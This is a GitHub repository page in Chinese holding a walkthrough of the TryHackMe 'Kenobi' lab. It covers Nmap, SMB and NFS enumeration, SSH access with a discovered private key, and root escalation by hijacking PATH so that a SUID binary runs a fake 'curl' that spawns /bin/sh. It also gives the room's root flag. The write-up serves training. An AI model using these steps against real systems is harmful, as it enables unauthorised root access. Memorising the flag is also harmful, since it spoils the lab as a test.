ianix34/tryhackme-kenobi

GitHub: ianix34/tryhackme-kenobi

一份 TryHackMe Kenobi 房间的渗透测试实战演练记录,覆盖从信息枚举到权限提升的完整攻击链路。

Stars: 0 | Forks: 0

# tryhackme-kenobi 实用渗透测试 (kenobi thm) - 枚举、NFS 利用以及通过 PATH 劫持进行权限提升。 # Kenobi - TryHackMe 实战演练 📌 概述 本房间涵盖: - 枚举 (Nmap, SMB, NFS) - FTP 漏洞利用 - 通过 PATH 劫持进行权限提升 🔍 侦察 ### Nmap 扫描 bash nmap -sC -sV 开放端口: - 21 (FTP) - 22 (SSH) - 80 (HTTP) - 111 (RPC) - 139/445 (SMB) - 2049 (NFS) 📂 枚举 ### SMB bash smbclient -L // ### NFS bash showmount -e 挂载共享: bash mount :/var /mnt/kenobiNFS 🔑 初始访问 发现私钥: bash /tmp/id_rsa 用于 SSH: bash ssh -i id_rsa kenobi@ ## 权限提升 发现 SUID 二进制文件: bash /usr/bin/menu PATH 劫持: bash echo "/bin/sh" > /tmp/curl chmod +x /tmp/curl export PATH=/tmp:$PATH /usr/bin/menu 获取 Root 权限: bash id uid=0(root) # Flag User flag: Root flag: <177b3cd8562289f37382721c28381f02>
标签:CTF Writeup, CTF攻略, CTF靶机, CTI, FTP漏洞, Kenobi, Linux提权, NFS挂载, NFS漏洞利用, Nmap扫描, osquery, PATH劫持, Privilege Escalation, Red Team, RPC枚举, SMB枚举, SSH私钥登录, SUID提权, TryHackMe, Web报告查看器, 内存分配, 协议分析, 安全实验, 安全攻防, 应用安全, 插件系统, 权限提升, 漏洞复现, 网络 Enumeration, 网络安全, 运维安全, 隐私保护, 靶机通关